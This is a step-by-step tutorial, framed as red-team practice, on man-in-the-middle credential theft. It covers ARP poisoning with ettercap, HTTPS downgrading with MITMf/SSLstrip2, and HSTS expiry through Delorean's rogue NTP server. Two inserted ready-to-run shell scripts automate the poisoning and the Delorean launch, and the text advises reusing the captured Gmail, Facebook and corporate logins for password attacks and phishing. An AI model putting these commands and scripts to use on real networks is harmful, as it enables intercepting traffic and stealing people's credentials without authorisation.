Man In The Middle (MITM): Capturing Credentials with SSLStrip2 and Delorean
Introduction and Objectives
This attack, as its name suggests, consists of placing the attacker's machine between the hosts of a network and their gateway (the router), so that their traffic passes through it. Its main objective is espionage: capturing sensitive data as it crosses the network, harvesting access credentials for devices and user accounts that can later serve for privilege escalation, learning which websites the organization's users visit (through ettercap's “remote browser” plugin) in order to prepare targeted phishing, and many other possibilities.
To begin, we will carry out the attack with two basic auditing tools, “ettercap” and “Wireshark”. With “ettercap” we first launch an “ARP spoofing” attack that poisons the victims' “ARP tables” and places us in the middle of the communications between the organization's machines and the router.
We complement this credential capture with plugins such as “remote browser”, which reveals the websites visited by the victim machines, or “DNS spoofing”, which redirects victims to sites prepared by the attacker for credential phishing or automatic malware downloads, as we saw in the article dedicated to “Evilgrade”. We will then move on to a more advanced attack against HTTPS using SSLstrip2, this time through “MITMf” (Man In The Middle Framework).
Running MITM with Ettercap
a) Configuring “Ettercap”
Before launching “Ettercap”, the “etter.conf” file has to be adjusted. The usual changes are to set “ec_uid” and “ec_gid” to 0 so that ettercap runs as root, and to uncomment the two iptables “redir_command_on” / “redir_command_off” lines in the Linux section, which redirect HTTPS (port 443) connections into ettercap's SSL dissector; that dissector is what later presents forged certificates to the victims.
b) Starting “Ettercap”
Once these changes are made, start “ettercap”. Select the wireless network interface and scan for the hosts on the network. Add the gateway's IP address as “Target 1” and the victim hosts as “Target 2”. Open the “Mitm” menu, choose “ARP poisoning” and tick “Sniff remote connections”, then accept and click “Start sniffing”. From this moment the MITM attack with ARP poisoning is running. In parallel, launch “Wireshark” to capture the traffic and keep real-time situational awareness of what is happening on the network.
With the attack running, load the “autoadd” plugin (Plugins → Manage the plugins). It automatically adds to the poisoning any new host that appears on the network within the target range.
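The two steps above (the etter.conf edits of section a) and the GUI sequence of section b)) as a text-mode script. This is an added example, not code from the original article: the etter.conf path (/etc/ettercap/etter.conf, the Debian/Ubuntu and Kali location), the interface and the address ranges are assumptions, and the sample configuration used to exercise it is constructed.

```shell
#!/usr/bin/env bash
# Added example (not from the original article): apply the standard etter.conf changes
# for an ettercap MITM and start the text-mode equivalent of the GUI steps in section b).
# The etter.conf path is an assumption; interface, gateway and victims are arguments.
set -eu

# 1) run ettercap as root (ec_uid/ec_gid = 0) so it may manage iptables, and
# 2) uncomment the Linux iptables redir_command_on/off lines so that HTTPS (port 443)
#    connections are redirected into ettercap's SSL dissector. ipchains/BSD lines stay commented.
prepare_etter_conf() {
  local conf="$1"
  sed -E \
    -e 's/^(ec_uid[[:space:]]*=[[:space:]]*)[0-9]+/\10/' \
    -e 's/^(ec_gid[[:space:]]*=[[:space:]]*)[0-9]+/\10/' \
    -e 's/^([[:space:]]*)#(redir_command_(on|off)[[:space:]]*=.*iptables.*)$/\1\2/' \
    "$conf" > "$conf.tmp" && mv "$conf.tmp" "$conf"
}

# Return 0 when the file carries all four expected settings, 1 otherwise.
check_etter_conf() {
  local conf="$1"
  grep -Eq '^ec_uid[[:space:]]*=[[:space:]]*0([[:space:]]|$)' "$conf" &&
  grep -Eq '^ec_gid[[:space:]]*=[[:space:]]*0([[:space:]]|$)' "$conf" &&
  grep -Eq '^[[:space:]]*redir_command_on[[:space:]]*=.*iptables' "$conf" &&
  grep -Eq '^[[:space:]]*redir_command_off[[:space:]]*=.*iptables' "$conf"
}

# Text-mode ettercap: -T text UI, -q quiet (print only sniffed data), -M arp:remote is
# "ARP poisoning" with "Sniff remote connections", -P autoadd loads the plugin from b).
# Target 1 is the gateway, target 2 the victims (single IP, list or range such as
# 192.168.1.10-50). Target syntax is /MAC/IPs/PORTs/; IPv6-enabled builds add a field,
# so check `ettercap --help` for the exact form on your version.
start_ettercap_mitm() {
  local iface="$1" gateway="$2" victims="$3"
  ettercap -T -q -i "$iface" -M arp:remote -P autoadd "/${gateway}//" "/${victims}//"
}

# Usage: sudo ./ettercap_mitm.sh wlan0 192.168.1.1 192.168.1.10-50
if [ "$#" -eq 3 ]; then
  conf=/etc/ettercap/etter.conf
  check_etter_conf "$conf" || prepare_etter_conf "$conf"
  check_etter_conf "$conf" || { echo "etter.conf still not configured" >&2; exit 1; }
  start_ettercap_mitm "$@"
fi
```

Wireshark is still started separately; the script only covers what the GUI steps configure. On distributions that ship etter.conf elsewhere, pass the right path through the `conf` variable.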
c) Running “Wireshark”
As mentioned, once “ettercap” is capturing data on the network we run “Wireshark” alongside it. This gives a view of everything crossing the interface, not only what ettercap's dissectors pick out, and a broader picture of the environment.
d) Capturing Credentials
How long it takes to capture credentials varies with many factors, but in an organizational network where employees are continuously connected, sensitive data starts appearing quickly.
In a short time the capture yields access credentials for Gmail, Hotmail, the organization's internal mail system, the surveillance cameras reachable through a No-IP hostname, and more.
It is worth noting that many of these credentials are probably reused for social media accounts such as Facebook or Twitter.
With these credentials an attacker can build a password list for attacks against the services running on the organization's systems, since password reuse across services is common. They could also send phishing emails requesting a password renewal for a specific organizational service, from a mailbox whose credentials were captured and which the recipients trust.
In essence, with this simple attack, an attacker would have the means to create various attack vectors that could seriously harm the organization.
e) Capturing sensitive information to create attack vectors
Furthermore, as mentioned earlier, if we use the “remote browser” plugin, we can see which websites the company’s machines are visiting. With this information, we can program a social engineering phishing attack vector using tools like “SET” or an “auto-download” attack through system updates using “Evilgrade,” for instance.
f) Considerations to Keep in Mind
Up to this point, we have seen how to carry out the most basic MITM attack. In this way, we have captured valuable information that can be used to create new attack vectors in later exploitation stages. However, anyone who has experienced an attack like the one described above knows very well that its effectiveness depends a lot on the target system.
For instance, when the victim runs an up-to-date system and browser and visits sites such as “Hotmail”, “Gmail” or “Facebook”, which are served over “https”, the browser shows a security warning about the certificate: ettercap's SSL dissector presents a forged certificate that no trusted authority has signed. That warning tells the user that someone may be intercepting the traffic.
These warnings are a serious problem in Red Team operations, because a user with even slight knowledge of network security will raise the alarm inside the organization and our activity will be detected. The situation is different for services that use plain “http”: everything travels in clear text and the sniffer captures it directly, much like an unencrypted “Netcat” session.
There is, however, a way around the automatic use of HTTPS enforced by “HSTS” (HTTP Strict Transport Security). HSTS is a response header with which a web server tells the browser to connect to it only over “https” for a given period (its “max-age”); this is what defeats the classic sslstrip downgrade, because the browser never issues the plain “http” request that could be intercepted. SSLstrip2 (sslstrip+) works around it by rewriting the hostnames in intercepted pages to look-alike hosts for which the browser holds no HSTS entry and resolving them through DNS spoofing. Two caveats: it does not help against domains preloaded into the browser with includeSubDomains, and a policy the browser has already cached must expire first, which is the role of Delorean later on. Next, we will attempt a practice session to evade HSTS and capture unencrypted network traffic.
Running MITM with SSLStrip2 and Delorean
a) Presentation and Launch of MITMf
The framework we will use in this demonstration for the “HTTPS bypass” is “MITMf” (Man In The Middle Framework), a toolkit that coordinates several attacks, including “ARP spoofing”, “DNS spoofing” and “SSLstrip2” (SSLstrip+) for downgrading HTTPS connections. DNS spoofing is used together with SSLstrip+ so that the look-alike hostnames it injects resolve to the attacker.
To launch the attack, we run “mitmf.py” with the following options:
- mitmf.py -i <interface> --spoof --hsts --arp --dns --gateway <gateway> --target <IP>
Here “--spoof --arp” performs the ARP poisoning, “--dns” the DNS spoofing and “--hsts” loads SSLstrip+ (later MITMf releases renamed “--target” to “--targets”). Once the command is running, we are in the middle of the data flows on the organization's network, capturing credentials sent over plain HTTP as well as those from connections MITMf has downgraded from HTTPS.
b) Launching “Delorean” to expire HSTS policies
It is also advisable to run “delorean.py”, a tool by “José Selvi” that acts as a rogue NTP (Network Time Protocol) server and answers the victims' time-synchronization requests with a date far in the future. Moving a victim's clock forward past the “max-age” of the HSTS policies its browser has cached makes those policies expire (as a side effect, HTTPS certificates also appear expired), so the browser can once again be made to use plain HTTP and its traffic captured in clear text.
However, a system's date can only be altered when it actually requests time synchronization, and this differs by platform. UNIX-like systems such as Ubuntu or Fedora pose few difficulties: they synchronize when joining the network or on reboot (Ubuntu) or every minute (Fedora). Windows is harder: it synchronizes only every few days and, in addition, rejects adjustments with a large time discrepancy, which leaves a narrow window for manipulation.
Although outside the scope of this work, OS X poses no particular complications either, since it synchronizes every few minutes depending on system load.
In short, within a time frame that depends on the operating system, a machine that joins a network where “delorean.py” is running will have its system date shifted and its cached HSTS policies expired, as explained above.
With the MITM in place, the NTP requests of the connected machines reach the tool, which answers them with the shifted date and thereby changes their system time.
If “delorean.py” exits with an error on start-up, the usual cause is that the local “ntpd” (Network Time Protocol daemon), which handles the attacker's own time synchronization, already holds UDP port 123, the port Delorean must bind to answer the victims' NTP requests. Stop “ntpd” before starting “delorean.py”.
To do so, find the PID (Process ID) of “ntpd” with “ps -A” (or “pgrep ntpd”) and terminate it with “kill PID”. If the service manager restarts it, stop the service instead (for example “systemctl stop ntp” or “ntpd”, depending on the distribution). After that, “delorean.py” starts without problems.
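A more reliable version of that check, as an added example that is not part of the original article or of Delorean: instead of guessing that “ntpd” is the culprit, ask the kernel who owns UDP/123 and stop that service before launching the tool (on current distributions it is as likely to be chronyd or systemd-timesyncd as ntpd). The `ss` output used for the offline demo is constructed; Delorean's checkout path (/opt/Delorean) and interpreter are assumptions.

```shell
#!/usr/bin/env bash
# Added example (not from the original article): check who owns UDP/123 on the
# attacking host before starting delorean.py, which needs that port to answer the
# victims' NTP requests. Delorean's path and interpreter are assumptions.
set -eu

# Read `ss -Hlunp` output on stdin and print "<process> <pid>" for each UDP/123
# listener (one line per process even if it binds both IPv4 and IPv6). Prints nothing
# when the port is free. Column 4 is the local address:port.
udp123_owners() {
  awk '
    $4 ~ /:123$/ && match($0, /users:\(\("[^"]+",pid=[0-9]+/) {
      s = substr($0, RSTART, RLENGTH)        # users:(("ntpd",pid=1234
      gsub(/users:\(\("|"/, "", s)           # ntpd,pid=1234
      split(s, f, /,pid=/)
      print f[1], f[2]
    }' | LC_ALL=C sort -u
}

# Free UDP/123: prefer stopping the service unit (so it is not restarted behind our
# back), and fall back to killing the PID, which is what the ps -A / kill step does.
free_udp123() {
  ss -Hlunp | udp123_owners | while read -r proc pid; do
    case "$proc" in
      ntpd)             units="ntp ntpd ntpsec" ;;   # Debian/Ubuntu, Fedora, NTPsec unit names
      chronyd)          units="chronyd chrony" ;;
      systemd-timesyn*) units="systemd-timesyncd" ;; # ss truncates the name to 15 chars
      *)                units="" ;;
    esac
    for u in $units; do
      if systemctl stop "$u" 2>/dev/null; then
        echo "stopped $u (pid $pid)"
        continue 2
      fi
    done
    kill "$pid" && echo "killed $proc (pid $pid)"
  done
}

# Stop whatever holds UDP/123, then start Delorean. Must run as root.
start_delorean() {
  if [ -n "$(ss -Hlunp | udp123_owners)" ]; then
    free_udp123
  fi
  python /opt/Delorean/delorean.py "$@"     # path and interpreter are assumptions
}

# Usage: sudo ./delorean_prep.sh --start [delorean options]
if [ "${1:-}" = "--start" ]; then
  shift
  start_delorean "$@"
fi
```

Remember to restart the time service on the attacking host afterwards; an attacker box whose own clock drifts will trip TLS validation on its own tooling.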
Capturing HTTPS Credentials
At this point, with “MITMf” and “delorean.py” both running, the victims' credentials are exposed to theft. When a user opens the login page of a service such as “Gmail”, the protection that “HSTS” would have provided has been bypassed: the connection goes over plain “HTTP” instead of “HTTPS”.
So when victims connect to “Gmail”, “Facebook” or any other site that requires HTTPS, the encryption is stripped and the intercepted credentials appear in the MITMf output:
In this way, we obtain credentials for “Gmail”, “Facebook” and other services belonging to members of the organization, which can then be used to launch social engineering attacks with a high degree of credibility.